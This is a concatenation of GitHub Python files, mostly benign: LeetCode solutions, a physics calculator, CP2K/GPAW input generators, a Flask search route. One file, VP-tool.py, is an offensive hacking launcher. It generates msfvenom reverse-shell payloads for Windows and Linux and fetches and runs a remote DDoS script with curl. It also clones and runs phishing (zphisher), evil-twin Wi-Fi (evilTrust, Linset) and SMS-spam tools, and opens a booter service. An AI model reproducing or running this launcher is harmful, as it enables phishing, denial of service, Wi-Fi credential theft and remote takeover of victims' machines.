self._update_receiver_bar_widget(channel, 1000)\r\n self._channels_label_array_object[channel].setPos(self.compute_channel_bar_location(channel) - 3, self.ui.transmitterOutput.height() - self._label_pixel_height)\r\n\r\n","repo_name":"AeroQuad/AeroQuadConfiguratorPyQt","sub_path":"ui/subpanel/vehicleoverallstatus/VehicleOverallStatusController.py","file_name":"VehicleOverallStatusController.py","file_ext":"py","file_size_in_byte":22855,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"35"} +{"seq_id":"13297251718","text":"'''\nGiven an array nums of n integers, return an array of all the unique quadruplets [nums[a], nums[b], nums[c], nums[d]] such that:\n\n0 <= a, b, c, d < n\na, b, c, and d are distinct.\nnums[a] + nums[b] + nums[c] + nums[d] == target\nYou may return the answer in any order.\n\n \n\nExample 1:\n\nInput: nums = [1,0,-1,0,-2,2], target = 0\nOutput: [[-2,-1,1,2],[-2,0,0,2],[-1,0,0,1]]\nExample 2:\n\nInput: nums = [2,2,2,2,2], target = 8\nOutput: [[2,2,2,2]]\n'''\n\n\nclass Solution:\n def fourSum(self, nums, target: int):\n nums = sorted(nums)\n n = len(nums)\n result = []\n for i in range(n-3):\n if i == 0 or nums[i] != nums[i-1]:\n for j in range(i+1, n-2):\n if nums[j] != nums[j-1] or j-1 == i:\n seen = set()\n seen3 = set()\n for k in range(j+1,n):\n if nums[k] in seen3:\n continue\n \n complement = target - nums[i]-nums[j]-nums[k]\n \n if complement in seen:\n result.append([nums[i], nums[j], nums[k], complement])\n seen3.add(nums[k])\n else:\n seen.add(nums[k])\n return result\n\n ","repo_name":"haruna99/DSA_Questions_and_Answers","sub_path":"hashtables and hashsets/4sum.py","file_name":"4sum.py","file_ext":"py","file_size_in_byte":1400,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"1520611950","text":"while True:\r\n choice = input(\"fnet, mass, acceleration?: \").lower()\r\n\r\n if choice == \"fnet\":\r\n Mass= int(input(\"mass?\\n\"))\r\n acceleration= int(input(\"acceleration?\\n\"))\r\n Fnet = (Mass*acceleration)\r\n print(f\"Fnet is equal to {Fnet}\")\r\n\r\n if choice == \"mass\":\r\n fnet= int(input(\"fnet?\\n\"))\r\n acceleration= int(input(\"acceleration?\\n\"))\r\n mass = (fnet/acceleration)\r\n print(f\"mass is equal to {mass}\")\r\n\r\n if choice == \"acceleration\":\r\n fnet= int(input(\"fnet?\\n\"))\r\n mass= int(input(\"mass?\\n\"))\r\n acceleration = (fnet/mass)\r\n print(f\"acceleration is equal to {acceleration}\")\r\n \r\n again = input(\"again? (yes/no): \").lower()\r\n \r\n if again !=\"yes\":\r\n break\r\nprint(\"ok bye\")\r\n","repo_name":"Nmuhra/Math-physics-tools","sub_path":"Fnet.py","file_name":"Fnet.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"40069686624","text":"from pymatgen.io.ase import AseAtomsAdaptor\nimport numpy as np\nimport ase.io, os\n\ndef xTB_input(calc_type = \"vcopt\", prefix = \"xtb\", cif_name = None,\n atoms = None, xtb_path = None, d3_path = None):\n\n \"\"\"\n Generate input file for xTB calculation (as implemented in CP2K).\n\n You must either set XTB_D3_PATH, and XTB_PARAMS_PATH as environment\n variables, or pass them into the relevant keywords (see below).\n\n Recommended to add e.g.\n export XTB_D3_PATH=/path/to/dftd3.dat\n export XTB_PARAMS_PATH=/path/to/xTB_parameters\n to your shell profile. If you do this, python will parse your \n environment variables for these file paths, and passing to the\n funtion is not needed.\n\n This function has two modes:\n ---------------------------MODE 1--------------------------------------\n calc_type = \"custom\" | Where you bring your own template file, and set this\n in the template kwarg. You can use the replace dictionary to store patterns\n for replacement with information about your system.\n\n E.g. replace = {\"@halogen_corr\":\".TRUE.\"} will search for @halogen_corr\n within your template file, and replace it with .TRUE. when generating\n the input file. \n ---------------------------MODE 1--------------------------------------\n\n ---------------------------MODE 2--------------------------------------\n calc_type = \"vcopt\", \"opt\", \"md\", \"scf\" | Where you use one of the\n default files contained explicitly, line for line in this function. \n\n The template used is determined by calc_type. The only things that will\n be determined on the fly are UKS (if nelect is odd) and the cif_file used\n to provide CP2K with cell parameters and atomic coordinates.\n\n Feel free to take these templates, modify them manually, and swap to \n calc_type = \"custom\" mode for more control over the templating. In fact\n this is encouraged, as the default templates are OVERLY general, and\n certainly not optimized for any particular system.\n ---------------------------MODE 2--------------------------------------\n\n Parameters:\n ----------\n calc_type (str)\n Type of calculation. Default is \"vcopt\". This\n is currently also the only option aside from \"custom\". See above.\n\n prefix (str)\n Prefix for output files. Default is \"xtb\". If a cif_name is not\n provided, but an Atoms object is, a cif of the form:\n f'{prefix}_{calc_type}.cif' will be generated and used to feed to\n CP2K.\n\n atoms (ase.Atoms)\n Atoms object to be used to generate cif file. If this is not\n provided, a cif_name must be provided. Don't provide cif_name\n if atoms are being passed.\n\n cif_name (str)\n Name of cif file to be used to feed to CP2K. If this is not\n provided, an atoms must be provided. Don't provide\n atoms if cif_name is being passed.\n \n Returns:\n -------\n None, generates input file:\n f'{prefix}_{calc_type}.inp'\n \"\"\"\n\n assert cif_name is not None or atoms is not None, \\\n \"Must provide either cif_name or atoms\"\n\n assert cif_name is None or atoms is None, \\\n \"Must provide either cif_name or atoms, not both\"\n\n\n # If no cif, needs to be written.\n if atoms is not None:\n cif_name = f'{prefix}_{calc_type}.cif'\n atoms.write(cif_name)\n\n # Let's try to use pymatgen to write the cif file.\n # Doesn't work\n # AseAtomsAdaptor().get_structure(atoms).to(filename=cif_name,\n # fmt=\"cif\")\n os.system(f\"obabel {cif_name} -O {cif_name}\")\n\n # Determins if UKS is needed.\n if _count_electrons(atoms) % 2 == 1:\n UKS = \".TRUE.\"\n else:\n UKS = \".FALSE.\"\n else:\n if _count_electrons(cif_name) % 2 == 1:\n UKS = \".TRUE.\"\n else:\n UKS = \".FALSE.\"\n\n\n # Checks kwargs\n if xtb_path is None:\n xtb_err_string = \"Must provide path to xTB parameters file either\" \\\n \"as an environment variable, or to the function.\\n\" \\\n \"See help(xTB_input) for more information.\"\n\n\n # Checks environment variables, raises error if unset.\n xtb_path = os.getenv(\"XTB_PARAMS_PATH\")\n if xtb_path is None:\n raise ValueError(xtb_err_string)\n else:\n if type(xtb_path) == str:\n if len(xtb_path) == 0:\n raise ValueError(xtb_err_string)\n\n\n # Checks kwargs\n if d3_path is None:\n d3_err_string = \"Must provide path to D3 parameters file either\" \\\n \"as an environment variable, or to the function.\\n\" \\\n \"See help(xTB_input) for more information.\"\n\n # Checks environment variables, raises error if unset.\n d3_path = os.getenv(\"XTB_D3_PATH\")\n if d3_path is None:\n raise ValueError(d3_err_string)\n else:\n if type(d3_path) == str:\n if len(d3_path) == 0:\n raise ValueError(d3_err_string)\n\n\n\n if calc_type == \"vcopt\":\n with open(f\"{prefix}_vcopt.inp\", \"w\") as fil:\n fil.write(f\"\"\"\\\n&FORCE_EVAL\n &DFT\n\tUKS {UKS}\n &QS\n METHOD xTB\n &xTB\n DO_EWALD T\n CHECK_ATOMIC_CHARGES F\n COULOMB_INTERACTION T\n &PARAMETER\n DISPERSION_PARAMETER_FILE {d3_path}\n PARAM_FILE_NAME {xtb_path}\n &END PARAMETER\n USE_HALOGEN_CORRECTION .TRUE.\n &END\n\n &DISTRIBUTION\n BASIC_OPTIMIZATION .FALSE.\n BASIC_SPATIAL_OPTIMIZATION .TRUE.\n &END\n \n &END QS\n &POISSON\n POISSON_SOLVER PERIODIC\n PERIODIC XYZ\n &END\n\n &SCF\n SCF_GUESS ATOMIC\n EPS_SCF 1.e-8\n &OT\n PRECONDITIONER FULL_SINGLE_INVERSE\n MINIMIZER DIIS\n\t\t ENERGY_GAP .03 ! A conservative ~.8 eV for most perovskites.\n &END\n MAX_SCF 500\n &END SCF\n\n &END DFT\n\n STRESS_TENSOR ANALYTICAL\n\n &SUBSYS\n &CELL\n CELL_FILE_FORMAT CIF\n CELL_FILE_NAME {cif_name}\n &END CELL\n &TOPOLOGY\n COORD_FILE_NAME {cif_name}\n COORD_FILE_FORMAT CIF\n\n &GENERATE \n !REORDER T \n &END GENERATE\n\n &END TOPOLOGY\n &END SUBSYS\n\n&END FORCE_EVAL\n\n&GLOBAL\n PROJECT_NAME {prefix}_{calc_type}\n RUN_TYPE CELL_OPT\n PRINT_LEVEL MEDIUM\n&END GLOBAL\n\n&MOTION\n &CELL_OPT\n MAX_ITER 500\n KEEP_SYMMETRY .TRUE.\n\tKEEP_ANGLES .TRUE.\n &END\n &GEO_OPT\n OPTIMIZER CG \n MAX_ITER 5000\n MAX_FORCE 9.7225D-4 \n TYPE MINIMIZATION\n &END\n &PRINT\n &FORCES ON\n &END FORCES\n &END PRINT\n&END\n\n \"\"\")\n\ndef GPAW_input(calc_type = \"fcopt\", prefix = \"gpaw\", cif_name = None,\n atoms = None, opt_algo = \"FIRE\", fmax = .02):\n\n \"\"\"\n Generates basic GPAW input file. Feel free to use as a template for the\n specific calculations you want to run. There are a lot of things that \n can speed up this type of calculation which are a bit too specific to\n include in a general template like the one used below.\n\n Parameters\n ----------\n calc_type : str\n Type of calculation to run. Options are \"fcopt\" currently.\n prefix : str\n Prefix for all output files.\n cif_name : str\n Name of cif file to use. If None, atoms must be provided.\n atoms : ase.Atoms\n Atoms object to use. If None, cif_name must be provided.\n opt_algo : str\n Optimization algorithm to use. Options are \"FIRE\" and \"BFGS\".\n fmax : float\n Force convergence criteria for optimization (in eV/Angstrom).\n\n Returns\n -------\n None, generates input file:\n f'{prefix}_{calc_type}.py'\n \"\"\"\n\n assert cif_name is not None or atoms is not None, \\\n \"Must provide either cif_name or atoms\"\n\n assert cif_name is None or atoms is None, \\\n \"Must provide either cif_name or atoms, not both\"\n\n if atoms is not None:\n cif_name = f'{prefix}_{calc_type}.cif'\n atoms.write(cif_name)\n\n\n kpt_str = \"kpts={'density': 6.0, 'gamma': True},\"\n par_str = \"parallel={'sl_auto': True},\"\n\n if calc_type == \"fcopt\":\n with open(f\"{prefix}_fcopt.py\", \"w\") as fil:\n fil.write(f\"\"\"\\\n\nfrom ase.optimize import BFGS, FIRE\nfrom gpaw import GPAW, PW\nimport ase.io, sys\n\ncurr_structure = ase.io.read('{cif_name}')\n\ncalc = GPAW(xc='PBE',\n mode=PW(450, dedecut='estimate'),\n {kpt_str}\n {par_str}\n txt= '{prefix}' + '_fixopt.txt')\n\ncurr_structure.calc = calc\nfix_relax = BFGS(curr_structure)\nfix_relax.run(fmax={fmax})\n\ncurr_structure.write('{prefix}' + '_OPT.cif')\n \"\"\")\n\n\n\n\ndef _count_electrons(cif):\n \"\"\"Count the number of electrons in a CIF file or Atoms object.\n\n Parameters\n ----------\n\n cif : str or Atoms object\n The CIF file or Atoms object to count electrons of.\n\n Returns\n -------\n Z : int\n The number of electrons in the CIF file or Atoms object.\n \"\"\"\n \n if type(cif) == str:\n atoms = ase.io.read(cif)\n else:\n atoms = cif.copy()\n\n return(int(np.sum(atoms.get_atomic_numbers())))\n\n","repo_name":"r2stanton/pyrovskite","sub_path":"pyrovskite/io.py","file_name":"io.py","file_ext":"py","file_size_in_byte":9191,"program_lang":"python","lang":"en","doc_type":"code","stars":8,"dataset":"github-code","pt":"35"} +{"seq_id":"5680514115","text":"class Solution:\n def rotate(self, matrix: List[List[int]]) -> None:\n \"\"\"\n Do not return anything, modify matrix in-place instead.\n \"\"\"\n\n n = len(matrix)\n res = []\n m = len(matrix[0])\n for i in range(m):\n t = []\n for j in matrix:\n t.append(j[i])\n t = t[::-1]\n res.append(t) \n matrix[:] = res","repo_name":"aashif000/MY_LEET_CODE_SOLUTIONS","sub_path":"48-rotate-image/rotate-image.py","file_name":"rotate-image.py","file_ext":"py","file_size_in_byte":408,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"35"} +{"seq_id":"25492716538","text":"\n# def flatNestedList(input):\n# res = []\n# for i in input:\n# if isinstance(i, list):\n# res += flatNestedList(i)\n# else:\n# res.append(i)\n# return res\n\n# input = [[1,1],2,[1,0,[3,4,5,[7,8,9,[11,12]]],1]]\n\n# if __name__ == '__main__':\n# res = flatNestedList(input)\n# print(res)\n\n# def flatNestedList(input):\n# for i in input:\n# if isinstance(i, list):\n# flatNestedList(i)\n# else:\n# res.append(i)\n\n# input = [[1,1],2,[1,1]]\n# res = []\n\n# if __name__ == '__main__':\n# flatNestedList(input)\n# print(res)\n\n# \"\"\"\n# This is the interface that allows for creating nested lists.\n# You should not implement it, or speculate about its implementation\n# \"\"\"\n#class NestedInteger:\n# def isInteger(self) -> bool:\n# \"\"\"\n# @return True if this NestedInteger holds a single integer, rather than a nested list.\n# \"\"\"\n#\n# def getInteger(self) -> int:\n# \"\"\"\n# @return the single integer that this NestedInteger holds, if it holds a single integer\n# Return None if this NestedInteger holds a nested list\n# \"\"\"\n#\n# def getList(self) -> [NestedInteger]:\n# \"\"\"\n# @return the nested list that this NestedInteger holds, if it holds a nested list\n# Return None if this NestedInteger holds a single integer\n# \"\"\"\n\nclass NestedIterator:\n def __init__(self, nestedList):\n self.nestedList = nestedList\n self.result = self.getFlatList(self.nestedList)\n self.index = 0\n \n def getFlatList(self, nestedList):\n result = []\n for i in nestedList:\n if isinstance(i, list):\n result += self.getFlatList(i)\n else:\n result.append(i)\n return result\n \n def next(self) -> int:\n self.index += 1\n if self.index <= len(self.result):\n return self.result[self.index - 1]\n \n def hasNext(self) -> bool:\n if self.index < len(self.result):\n return True\n else:\n return False\n\n\nif __name__ == '__main__':\n input = [[1,1],2,[1,0,[3,4,5,[7,8,9,[11,12]]],1]]\n test = NestedIterator(input)\n result = []\n while test.hasNext():\n result.append(test.next())\n print(result)","repo_name":"zhanghaofeng/junos-automation","sub_path":"python/flatten_nested_list.py","file_name":"flatten_nested_list.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"35"} +{"seq_id":"45211618453","text":"import os\r\nimport time\r\nimport json\r\nimport subprocess\r\nimport webbrowser\r\nimport socket\r\n\r\n# <--Return to Menu-->\r\ndef start_menu():\r\n os.system(\"clear\")\r\n print(banner)\r\n print(decoracion)\r\n# <----sn1per---->\r\ndef sn1per():\r\n os.system(\"git clone https://github.com/1N3/Sn1per\")\r\n os.system(\"cd Sn1per\")\r\n os.system(\"sudo bash install.sh\")\r\n# <----comprobar IP---->\r\ndef comprIP():\r\n nombre_equipo = socket.gethostname()\r\n direccion_equipo = socket.gethostbyname(nombre_equipo)\r\n print(\"n-host\" + nombre_equipo)\r\n print(\"IP:\" + direccion_equipo)\r\n time.sleep(5)\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\n# <----Enviar sms falso---->\r\ndef fakesms():\r\n os.system(\"clear\")\r\n print(\"banner\")\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n if option == \"1\": \r\n os.system(\"git clone https://github.com/Darkmux/DarkSMS\")\r\n print(\"Downloaded!!!\")\r\n time.sleep(1)\r\n while True:\r\n fakesms()\r\n if option == \"2\":\r\n os.system(\"mv DarkSMS/* .\")\r\n os.system(\"cd DarkSMS\")\r\n os.system(\"bash darksms.sh\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\n\r\n# <--Metasploit-->\r\ndef IPtracker():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/JasonJerry/IPtracker\")\r\n print(\"Download!!!\")\r\n time.sleep(1)\r\n while True:\r\n IPtracker()\r\n if option == \"2\":\r\n os.system(\"mv IPtracker/* .\")\r\n os.system(\"cd IPtracker\")\r\n os.system(\"bash iptracker.sh\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\ndef msf():\r\n os.system(\"clear\")\r\n print(banner)\r\n print(\" | 1 -->> Windows reverse shell\")\r\n print(\" | 2 -->> Linux reverse shell x86\")\r\n print(\" | 3 -->> Linux reverse shell x64\")\r\n print(\" | 4 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n if option == \"1\":\r\n \r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->> \")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p windows/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f exe > download.exe\")\r\n red()\r\n print(\"FileName == download.exe\")\r\n time.sleep(2)\r\n while True:\r\n msf()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->>\")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f elf > downloadx86.elf\")\r\n red()\r\n print(\"FileName == downloadx86.elf\")\r\n time.sleep(2)\r\n while True:\r\n msf()\r\n\r\n if option == \"3\":\r\n\r\n print(\"\")\r\n ip = input(\"IP -->> \")\r\n port = input(\"PORT ->> \")\r\n yellow()\r\n print(\"Creating payload...\")\r\n os.system(\"msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=\"+ip+\" LPORT=\"+port+\" -f elf > downloadx64.elf\")\r\n red()\r\n time.sleep(2)\r\n print(\"FileName == downloadx64.elf\")\r\n while True:\r\n msf()\r\n\r\n if option == \"4\":\r\n decoracion()\r\n start_menu()\r\ndef Ghostf():\r\n os.system(\"clear\")\r\n print(banner)\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\\n\")\r\n option = input(\"-->: \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/ParikhKadam/ghost-1\")\r\n os.system(\"cd ghost-1\")\r\n os.system(\"chmod +x install.sh\")\r\n os.system(\"sudo bash install.sh\")\r\n time.sleep(5)\r\n while True:\r\n Ghostf()\r\n if option == \"2\":\r\n os.system(\"./ghost\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n start_menu()\r\ndef Goyscript():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" 2 -->> Execute Tool \")\r\n print(\" 3 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/0x90/wps-scripts\")\r\n yellow()\r\n print(\"Downloaded!!!\")\r\n time.sleep(5)\r\n while True:\r\n Goyscript()\r\n if option == \"2\":\r\n os.system(\"cd wps-scripts/goyscript\")\r\n os.system(\"chmod +x conectar.sh\")\r\n os.system(\"sudo bash conectar.sh\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n start_menu()\r\ndef phoneinfoga():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" 2 -->> Execute Tool \")\r\n print(\" 3 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"git clone https://github.com/sundowndev/PhoneInfoga\")\r\n os.system(\"cd PhoneInfoga/\")\r\n os.system(\"python3 -m pip install -r requirements.txt\")\r\n purple()\r\n print(\"Downloaded!!\")\r\n time.sleep(3)\r\n while True:\r\n phoneinfoga()\r\n \r\n if option == \"2\":\r\n os.system(\"cd PhoneInfoga/\")\r\n print(\"the phoneinfoga commands are:python3 phoneinfoga scan +number\")\r\n print(\"example: python3 phoneinfoga scan +36897153568\")\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\ndef ddos():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n print(\"\")\r\n if option == \"1\":\r\n yellow()\r\n print(\"\")\r\n print(\"Downloading...\")\r\n os.system(\"curl https://raw.githubusercontent.com/yorkox0/exaple01/main/ddos.py -o ddos.py\")\r\n red()\r\n print(\"Downloaded!!\")\r\n time.sleep(2)\r\n while True:\r\n ddos()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n os.system(\"python3 ddos.py\")\r\n\r\n if option == \"3\":\r\n start_menu()\r\ndef freestresser():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red() \r\n print(\" 1 -->> Web Tool\")\r\n print(\" 2 -->> Exit \")\r\n option = input(\" -->>\")\r\n if option == \"1\":\r\n webbrowser.open_new(\"https://freestresser.to/\")\r\n if option == \"2\":\r\n start_menu()\r\ndef Linset():\r\n os.system(\"clear\")\r\n purple()\r\n print(banner)\r\n red() \r\n print(\" 1 -->> Download Tool 1 \")\r\n print(\" 2 -->> download Tool 2 (utilizar desp de haber instalado el down 1\")\r\n print(\" 3 -->> download Tool 3 (utilizar desp de haber instalado el down 2\")\r\n print(\" 4 -->> Execute Tool \")\r\n print(\" 5 -->> Exit \")\r\n option = input(\" ↳ \")\r\n if option == \"1\":\r\n os.system(\"cd\")\r\n os.system(\"git clone https://github.com/creadpag/linset.git \")\r\n os.system(\"sudo leafpad /etc/apt/sources.list\")\r\n os.system(\"sudo deb http://ftp.de.debian.org/debian testing main contrib non-free\")\r\n os.system(\"sudo deb http://ftp.debian.org/debian/ jessie-updates main contrib non-free\")\r\n os.system(\"sudo deb http://security.debian.org/ jessie/updates main contrib non-free\")\r\n time.sleep(5)\r\n while True:\r\n linset()\r\n if option == \"2\":\r\n os.system(\"apt-get update\")\r\n os.system(\"apt-get upgrade\")\r\n time.sleep(1)\r\n while True:\r\n linset()\r\n\r\n if option == \"3\":\r\n os.system(\"apt-get install isc-dhcp-server\")\r\n os.system(\"apt-get install hostapd\")\r\n os.system(\"apt-get install lighttpd\")\r\n os.system(\"apt-get install Php5-cgi\")\r\n time.sleep(5)\r\n os.system(\"clear\")\r\n start_menu()\r\n if option == \"4\":\r\n os.system(\"cd\")\r\n os.system(\" cd linset\")\r\n os.system(\"chmod +x linset\")\r\n os.system(\"./linset\")\r\n if option == \"5\":\r\n start_menu()\r\ndef phishing():\r\n os.system(\"clear\")\r\n\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute tool\")\r\n print(\" | 3 -->> Exit\")\r\n option = input(\" ↳ \")\r\n\r\n print(\"\")\r\n if option == \"1\":\r\n \r\n yellow()\r\n os.system(\"git clone https://github.com/htr-tech/zphisher\")\r\n print(\"\")\r\n red()\r\n print(\"Downloaded!!\")\r\n time.sleep(1)\r\n while True:\r\n phishing()\r\n\r\n if option == \"2\":\r\n print(\"\")\r\n os.system(\"mv zphisher/* .\")\r\n os.system(\"mv zphisher/.sites .\")\r\n os.system(\"bash zphisher.sh\")\r\n\r\n if option == \"3\":\r\n os.system(\"clear\")\r\n decoracion()\r\n start_menu()\r\n\r\ndef wpscan():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n blue()\r\n print(\"\")\r\n purple()\r\n web = input(\"Web whith https:// -->> \")\r\n yellow()\r\n print(\"Do you want to save it on web.txt? y/n\")\r\n if input(\"-->> \") == \"y\":\r\n os.system(\"wpscan --url \"+web +\">> web.txt\")\r\n red()\r\n print(\"Saved!!\")\r\n time.sleep(1)\r\n while True:\r\n start_menu()\r\n else:\r\n os.system(\"wpscan --url \"+web)\r\n red()\r\n input(\"Press INTRO to exit\")\r\n while True:\r\n decoracion()\r\n start_menu()\r\n\r\ndef eviltrust():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n\r\n option = input(\" +-> \")\r\n if option == \"1\":\r\n print(\"Downloading...\")\r\n yellow()\r\n os.system(\"git clone https://github.com/s4vitar/evilTrust\")\r\n red()\r\n print(\"Downloaded!\")\r\n time.sleep(2)\r\n while True:\r\n eviltrust()\r\n\r\n if option == \"2\":\r\n os.system(\"mv evilTrust/* .\")\r\n os.system(\"clear\")\r\n os.system(\"sudo bash evilTrust.sh -m terminal\")\r\n\r\n if option == \"3\":\r\n decoracion()\r\n start_menu()\r\n\r\ndef sms():\r\n os.system(\"clear\")\r\n red()\r\n print(banner)\r\n purple()\r\n print(\" | 1 -->> Download Tool\")\r\n print(\" | 2 -->> Execute Tool\")\r\n print(\" | 3 -->> Exit\")\r\n\r\n option = input(\" +-> \")\r\n if option == \"1\":\r\n print(\"Downloading...\")\r\n yellow()\r\n os.system(\"git clone https://github.com/Darkmux/SETSMS\")\r\n red()\r\n print(\"Downloaded!\")\r\n time.sleep(2)\r\n while True:\r\n sms()\r\n\r\n if option == \"2\":\r\n os.system(\"mv SETSMS/* .\")\r\n os.system(\"chmod 777 SETSMS.sh\")\r\n os.system(\"bash SETSMS.sh\")\r\n\r\n if option == \"3\":\r\n decoracion()\r\n start_menu()\r\n\r\n \r\nfrom sys import stdout\r\n\r\ndef red():\r\n RED = \"\\033[1;31m\"\r\n stdout.write(RED)\r\n\r\ndef green():\r\n GREEN = \"\\033[0;32m\"\r\n stdout.write(GREEN)\r\n\r\n\r\ndef blue():\r\n BLUE = \"\\033[1;34m\"\r\n stdout.write(BLUE)\r\n\r\ndef yellow():\r\n YELLOW = \"\\033[1;33m\"\r\n stdout.write(YELLOW)\r\n\r\ndef purple():\r\n PURPLE = \"\\033[1;35m\"\r\n stdout.write(PURPLE)\r\n\r\ndef white():\r\n WHITE = \"\\033[1;37m\"\r\n stdout.write(WHITE)\r\n\r\n\r\n\r\ndef decoracion():\r\n # hola\r\n print(\"1 --comprobacion de ip\")\r\n print(\"2 --> IPtracker\")\r\n print(\"3 --> msfVenom\")\r\n print(\"4 --> goyscript\")\r\n print(\"5 --> ghostF\")\r\n print(\"6 --> phoneinfoga\")\r\n print(\"7 --> Ddos\")\r\n print(\"8 -->freestresser\")\r\n print(\"9 --> Linset\")\r\n print(\"10 --> Zphisher\")\r\n print(\"11 --> eviltrust\")\r\n print(\"12 --> Spam SMS\")\r\n print(\"13 -->FAKEsms\")\r\n print(\"14 --Exit\")\r\n option = input(\" +-> \")\r\n\r\n if option == \"1\":\r\n comprIP()\r\n if option == \"2\":\r\n IPtracker()\r\n if option == \"3\":\r\n msf()\r\n if option == \"4\":\r\n Goyscript()\r\n if option == \"5\":\r\n Ghostf()\r\n if option == \"6\":\r\n phoneinfoga()\r\n if option == \"7\":\r\n ddos()\r\n if option == \"8\":\r\n freestresser()\r\n if option == \"9\":\r\n Linset()\r\n if option == \"10\":\r\n phishing()\r\n if option == \"11\":\r\n eviltrust()\r\n if option == \"12\":\r\n sms()\r\n if option == \"13\":\r\n fakesms()\r\n if option == \"14\":\r\n os.system(\"clear\")\r\n exit()\r\n\r\nbanner = \"\"\"\r\n__ ______ _ _ \r\n\\ \\ / / _ \\ | |_ ___ ___ | | \r\n \\ \\ / /| |_) |____| __/ _ \\ / _ \\| |\r\n \\ V / | __/_____| || (_) | (_) | |\r\n \\_/ |_| \\__\\___/ \\___/|_|\r\n V\r\n 2\r\n\"\"\"\r\nprint(banner)\r\n\r\n# <-- iniciar la tool -->\r\ndecoracion()\r\nstart_menu\r\n","repo_name":"mouse3/VP-tool","sub_path":"VP-tool.py","file_name":"VP-tool.py","file_ext":"py","file_size_in_byte":14800,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9317563174","text":"from flask import render_template, request, Blueprint\n\nfrom Lab7.models import SearchService\n\nfrom .method import Method\n\nblueprint = Blueprint('search', __name__)\nsearch_service = SearchService()\n\n\n@blueprint.route('/search', methods=[Method.GET, Method.POST])\ndef index():\n authors = search_service.get_authors()\n publishers = search_service.get_publishers()\n genres = search_service.get_genres()\n\n if request.form.get('clear'):\n selected_genres = []\n selected_publishers = []\n selected_authors = []\n else:\n selected_genres = list(map(int, request.form.getlist('genre_id')))\n selected_publishers = list(map(int, request.form.getlist('publisher_id')))\n selected_authors = list(map(int, request.form.getlist('author_id')))\n\n cards = search_service.get_cards(selected_genres, selected_publishers, selected_authors)\n\n html = render_template(\n 'search.jinja2',\n authors=authors,\n publishers=publishers,\n genres=genres,\n cards=cards,\n selected_authors=selected_authors,\n selected_publishers=selected_publishers,\n selected_genres=selected_genres,\n len=len\n )\n return html\n","repo_name":"markov-avl/PythonBackend","sub_path":"Lab7/controllers/search.py","file_name":"search.py","file_ext":"py","file_size_in_byte":1199,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"7200541174","text":"# itertools의 combinations를 이용하여 풀었다.\n# 총 nCk 개의 튜플을 리스트형식으로 반환\n\nfrom itertools import combinations\n\nwhile True:\n test = input()\n if test == \"0\":\n break\n\n k, *s = list(test.split())\n for i in combinations(s, 6):\n print(\" \".join(i))\n print()\n\n\n","repo_name":"seong-wooo/Algorithm_Study","sub_path":"백준/BOJ 길라잡이 베타(1) 문제집/6603_로또.py","file_name":"6603_로또.py","file_ext":"py","file_size_in_byte":319,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"35067386430","text":"# Write a function `can_construct(target, word_bank)` that accepts a\n# target string and an array of strings.\n\n# The function should return a boolean indicating whether or not the\n# `target` can be constructed by concatenating elements of the\n# 